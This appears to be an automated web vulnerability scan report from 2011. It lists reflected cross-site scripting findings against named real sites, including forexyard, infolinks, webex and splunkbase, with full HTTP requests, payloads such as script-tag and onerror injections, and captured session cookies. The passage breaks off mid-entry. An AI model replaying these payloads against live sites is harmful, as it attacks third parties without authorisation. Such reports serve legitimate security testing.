Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=a51bb--><script>alert(1)</script>b772c65691c&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pairs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1837"><script>alert(1)</script>5046a7dd34d was submitted in the pairs parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHFa1837"><script>alert(1)</script>5046a7dd34d&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the zone_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b8d"%3balert(1)//289c9475d9c was submitted in the zone_id parameter. This input was echoed as b6b8d";alert(1)//289c9475d9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129b6b8d"%3balert(1)//289c9475d9c HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the zone_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef6d3"><script>alert(1)</script>4530cb81810 was submitted in the zone_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129ef6d3"><script>alert(1)</script>4530cb81810 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 121ed<script>alert(1)</script>8c175286485 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1296944121644.0?callback=INFOLINKS.gsdCallback121ed<script>alert(1)</script>8c175286485&pid=112737&wsid=0&pdom=www.scare666.com&jsv=209 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.scare666.com/news/gambar6823d%3Cscript%3Ealert(document.cookie)%3C/script%3E3f01d4d8a23 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset=UTF-8 Content-Length: 184 Date: Sat, 05 Feb 2011 22:35:02 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b7a06<script>alert(1)</script>9e0d94a54f4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1296944132032.0?callback=INFOLINKS.gsdCallbackb7a06<script>alert(1)</script>9e0d94a54f4&pid=112737&wsid=0&pdom=www.scare666.com&jsv=209.1 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.scare666.com/news/gambar6823d%3Cscript%3Ealert(document.cookie)%3C/script%3E3f01d4d8a23 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset=UTF-8 Content-Length: 186 Date: Sat, 05 Feb 2011 22:35:10 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a702b<script>alert(1)</script>e020ac7d6aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1296944168552.0?callback=INFOLINKS.gsdCallbacka702b<script>alert(1)</script>e020ac7d6aa&pid=112737&wsid=0&pdom=www.scare666.com&jsv=209.1 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.scare666.com/news/gambar6823d%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3f01d4d8a23 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset=UTF-8 Content-Length: 186 Date: Sat, 05 Feb 2011 22:35:19 GMT Connection: close
The value of the fuid request parameter is copied into the HTML document as plain text between tags. The payload 87eb5<script>alert(1)</script>139bdf357156264fe was submitted in the fuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944169071.1&twnum=8&rts=1296944169071&crtss=30&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b639287eb5<script>alert(1)</script>139bdf357156264fe&rid=&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=46404459464e4459454643594543445846454e414e4343454141424f475869707271&pid=112737&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&crt=1&csilv=3%2E0%2E50611%2E0&crtwa=728&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 7b8d9<script>alert(1)</script>1b63b6cceb51a55a4 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944169071.1&twnum=8&rts=1296944169071&crtss=30&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b6392&rid=7b8d9<script>alert(1)</script>1b63b6cceb51a55a4&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=46404459464e4459454643594543445846454e414e4343454141424f475869707271&pid=112737&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&crt=1&csilv=3%2E0%2E50611%2E0&crtwa=728&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
The value of the fuid request parameter is copied into the HTML document as plain text between tags. The payload beb51<script>alert(1)</script>e720329519ecd3420 was submitted in the fuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944132135.1&twnum=8&rts=1296944132136&crt=1&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b6392beb51<script>alert(1)</script>e720329519ecd3420&rid=&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=4345415c434b415c4043465c4046415d43404b444b4646404142424a465d69747274&csilv=3%2E0%2E50611%2E0&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&pid=112737&crtwa=728&crtss=30&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload ff64d<script>alert(1)</script>4f721153ea292428 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944132135.1&twnum=8&rts=1296944132136&crt=1&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b6392&rid=ff64d<script>alert(1)</script>4f721153ea292428&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=4345415c434b415c4043465c4046415d43404b444b4646404142424a465d69747274&csilv=3%2E0%2E50611%2E0&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&pid=112737&crtwa=728&crtss=30&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
The value of the fuid request parameter is copied into the HTML document as plain text between tags. The payload 62e7f<script>alert(1)</script>b664e74e90dbc44a3 was submitted in the fuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944122040.1&crtwa=728&twnum=8&rts=1296944122041&crtss=30&rcate=&anow=&crt=1&rid=&ref=burp&fuid=62e7f<script>alert(1)</script>b664e74e90dbc44a3&refq=&rh=&wsid=0&by=f&pdom=www%2Escare666%2Ecom&csilv=3%2E0%2E50611%2E0&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&page%5Fkeyw=&ms=81&jsv=209&makey=4244405d424a405d4142475d4147405c42414a454a474741424a4440415c69767476&crtw=728&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&pid=112737&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 3984a<script>alert(1)</script>d2b79777ae4b361b6 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944122040.1&crtwa=728&twnum=8&rts=1296944122041&crtss=30&rcate=&anow=&crt=1&rid=3984a<script>alert(1)</script>d2b79777ae4b361b6&ref=burp&fuid=&refq=&rh=&wsid=0&by=f&pdom=www%2Escare666%2Ecom&csilv=3%2E0%2E50611%2E0&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&page%5Fkeyw=&ms=81&jsv=209&makey=4244405d424a405d4142475d4147405c42414a454a474741424a4440415c69767476&crtw=728&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&pid=112737&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69e60<img%20src%3da%20onerror%3dalert(1)>cf07a33562d was submitted in the REST URL parameter 1. This input was echoed as 69e60<img src=a onerror=alert(1)>cf07a33562d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0305l69e60<img%20src%3da%20onerror%3dalert(1)>cf07a33562d/mywebex/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Date: Sat, 05 Feb 2011 22:59:37 GMT Server: Apache Content-Length: 95 Set-Cookie: JSESSIONID=wQpnNNWZKGkD3Fvy49My16T2f673R4kb13PtRhvHQXP9pNvnv9Wf!1468971393; path=/ Connection: close Content-Type: text/html
Invalid path /mw0305l69e60<img src=a onerror=alert(1)>cf07a33562d/mywebex/default was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b499<img%20src%3da%20onerror%3dalert(1)>ba126beb79a was submitted in the REST URL parameter 2. This input was echoed as 9b499<img src=a onerror=alert(1)>ba126beb79a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0305l/mywebex9b499<img%20src%3da%20onerror%3dalert(1)>ba126beb79a/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Date: Sat, 05 Feb 2011 22:59:42 GMT Server: Apache Content-Length: 87 Set-Cookie: JSESSIONID=lBlLNNWp45qdNzBYc0nS9jJpHfhnZFPGkGvDDwhn6N4WtDrncRft!88149066; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html
Invalid path /mywebex9b499<img src=a onerror=alert(1)>ba126beb79a/default was requested
The value of the 1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a53c"><script>alert(1)</script>00b06087c8 was submitted in the 1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:43 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web ...[SNIP]... <a href="/account:login/?return_to=/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=13a53c"><script>alert(1)</script>00b06087c8"> ...[SNIP]...
4.163. http://splunkbase.splunk.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://splunkbase.splunk.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ffc5"><script>alert(1)</script>46cc332d1dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1ffc5"><script>alert(1)</script>46cc332d1dc=1 HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c71"><script>alert(1)</script>af5883db310 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the redir request parameter is copied into the HTML document as plain text between tags. The payload c742e<script>alert(1)</script>f002713d5a3 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7402b"><script>alert(1)</script>8ee62d23cd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps7402b"><script>alert(1)</script>8ee62d23cd0/All/4.x/ HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:01:59 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4529 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web3 ...[SNIP]... <a href="/account:login/?return_to=/apps7402b"><script>alert(1)</script>8ee62d23cd0/All/4.x/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1abb1"><script>alert(1)</script>a34c6b70f00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps/All1abb1"><script>alert(1)</script>a34c6b70f00/4.x/ HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:02:04 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4529 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web4 ...[SNIP]... <a href="/account:login/?return_to=/apps/All1abb1"><script>alert(1)</script>a34c6b70f00/4.x/"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d256"><script>alert(1)</script>57ae3520054 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
